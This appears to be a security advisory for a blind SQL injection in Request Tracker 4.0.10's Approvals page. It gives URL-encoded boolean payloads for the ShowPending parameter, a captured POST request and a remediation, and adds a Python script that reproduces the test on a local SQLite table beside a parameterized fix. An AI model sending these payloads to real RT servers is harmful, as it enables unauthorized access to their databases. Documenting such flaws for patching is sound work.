
RT: Request Tracker 4.0.10 SQL Injection Vulnerability


# Exploit Title: - SQL-Injection - RT: Request Tracker System
# Date: 10/05/2013
# Exploit Author: cheki
# Vendor Homepage: http://bestpractical.com/rt/
# Version: RT 4.0.10
# Tested on: Kali Linux

########################################################################################
URL: http://10.10.10.70/Approvals/
Entity: ShowPending (Parameter)
Risk: It is possible to view, modify or delete database entries and tables
Causes: Sanitization of hazardous characters was not performed correctly on user input
Fix: Pass user input to the database through parameterized queries (bind variables) instead of interpolating it into SQL text; review other possible solutions for hazardous character injection

#Description: Blind SQL Injection: append Boolean True/False string expressions, using apostrophes
and commenting out the rest of the query.
#The following changes were applied to the original request (URL-decoded value in brackets)
1) Set parameter 'ShowPending's value to '1%27+and+%27f%27%3D%27f%27%29+--+'   [1' and 'f'='f') -- ]   (always true)
2) Set parameter 'ShowPending's value to '1%27+and+%27b%27%3D%27f%27%29+--'    [1' and 'b'='f') --]    (always false)
3) Set parameter 'ShowPending's value to '1%27+or+%27b%27%3D%27f%27%29+--'     [1' or 'b'='f') --]     (logically equal to the original)


POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://10.10.10.70/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=

#########################################################################################
Reasoning: The test result seems to indicate a vulnerability because it shows that values
can be appended to parameter values, indicating that they were embedded in an SQL query. In
this test, three (or sometimes four) requests are sent. The last is logically equal to the original, and the
next-to-last is different. Any others are for control purposes. A comparison of the last two responses with
the first (the last is similar to it, and the next-to-last is different) indicates that the application is vulnerable.
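As an added worked example (not part of this advisory and not code from Best Practical's RT), the following Python script reproduces the three-request Boolean differential described above against a constructed in-memory SQLite table. A hypothetical string-interpolated query stands in for the vulnerable server-side code and a parameterized version sits beside it; the table, the column names and the query shape (a parenthesized WHERE clause, which is why the payloads close with `)`) are assumptions. It also rebuilds the POST body from the URL-decoded payload to show that the scanner's encoding round-trips exactly.

```python
import sqlite3
from urllib.parse import unquote_plus, urlencode

# The three ShowPending values from the advisory, exactly as the scanner sent them.
PAYLOADS = {
    "true_and":  "1%27+and+%27f%27%3D%27f%27%29+--+",   # 1' and 'f'='f') --
    "false_and": "1%27+and+%27b%27%3D%27f%27%29+--",    # 1' and 'b'='f') --
    "true_or":   "1%27+or+%27b%27%3D%27f%27%29+--",     # 1' or 'b'='f') --
}

# Remaining form fields from the captured request (values as captured).
OTHER_FIELDS = [("ShowResolved", "1"), ("ShowRejected", "1"),
                ("ShowDependent", "1"), ("CreatedBefore", ""), ("CreatedAfter", "")]


def decode_payload(encoded):
    """URL-decode one ShowPending value ('+' becomes a space)."""
    return unquote_plus(encoded)


def build_body(show_pending):
    """Rebuild the application/x-www-form-urlencoded POST body for a given ShowPending value."""
    return urlencode([("ShowPending", show_pending)] + OTHER_FIELDS)


def make_db():
    """Constructed sample data: a handful of approval rows, some pending, plus one non-approval row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tickets (id INTEGER, type TEXT, pending INTEGER)")
    conn.executemany("INSERT INTO tickets VALUES (?, ?, ?)",
                     [(1, "approval", 1), (2, "approval", 1),
                      (3, "approval", 0), (4, "ticket", 1)])
    return conn


def vulnerable_query(conn, show_pending):
    """Hypothetical vulnerable server side: user input interpolated straight into SQL text.
    The single quote in the payload closes the literal, ')' closes the parenthesized
    WHERE clause, and '--' comments out the rest of the original query."""
    sql = ("SELECT id FROM tickets WHERE (type = 'approval' AND pending = '%s')"
           % show_pending)
    return [row[0] for row in conn.execute(sql)]


def safe_query(conn, show_pending):
    """Same query with a bind variable: the payload is compared as data, never parsed as SQL."""
    sql = "SELECT id FROM tickets WHERE (type = 'approval' AND pending = ?)"
    return [row[0] for row in conn.execute(sql, (show_pending,))]


def boolean_blind_check(query):
    """The advisory's differential test: an always-true AND and an always-true OR
    must reproduce the baseline response while the always-false AND must differ.
    Returns True when the query behaves like an injectable one."""
    conn = make_db()
    baseline = query(conn, "1")
    r_true = query(conn, decode_payload(PAYLOADS["true_and"]))
    r_false = query(conn, decode_payload(PAYLOADS["false_and"]))
    r_or = query(conn, decode_payload(PAYLOADS["true_or"]))
    return r_true == baseline and r_or == baseline and r_false != baseline


if __name__ == "__main__":
    print("vulnerable query injectable:", boolean_blind_check(vulnerable_query))
    print("parameterized query injectable:", boolean_blind_check(safe_query))
    print("rebuilt body:", build_body(decode_payload(PAYLOADS["true_and"])))
```

The parameterized variant fails the differential because every payload is compared as an opaque string against the integer column and returns nothing, so neither "true" variant matches the baseline; the interpolated variant reproduces the advisory's pattern exactly (true, false, true-by-OR).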


Home Page: securitylabnews.blogspot.com




//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc. nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information



